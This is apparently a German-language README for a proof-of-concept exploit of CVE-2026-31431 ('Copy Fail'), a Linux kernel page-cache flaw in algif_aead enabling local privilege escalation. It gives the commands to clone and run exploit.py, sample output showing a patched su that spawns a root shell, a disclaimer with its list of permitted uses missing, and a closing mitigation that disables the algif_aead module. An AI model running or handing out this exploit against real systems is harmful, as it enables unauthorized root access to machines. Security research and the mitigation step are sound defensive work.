
CVE-2026-31431 - Linux-Kernel-Page-Cache-Sicherheitslücke
Dieses Projekt wird ausschließlich bereitgestellt für:
Der Autor und die Mitwirkenden sind NICHT verantwortlich für Missbrauch, Schäden, Datenverlust, Dienstunterbrechungen oder illegale Aktivitäten, die mit dieser Software durchgeführt werden.
Proof-of-Concept-Forschungstool für CVE-2026-31431, auch bekannt als „Copy Fail“, eine Linux-Kernel-Schwachstelle, die die AEAD-Implementierung algif_aead / authencesn betrifft.
Die Schwachstelle kann unter bestimmten Bedingungen eine Beschädigung des Page Cache ermöglichen und möglicherweise zu einer lokalen Rechteausweitung auf verwundbaren Systemen führen.
Repository klonen:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
Wenn Sie dazu aufgefordert werden:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
Wenn Sie Systemadministrator sind und die Gefährdung reduzieren müssen:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null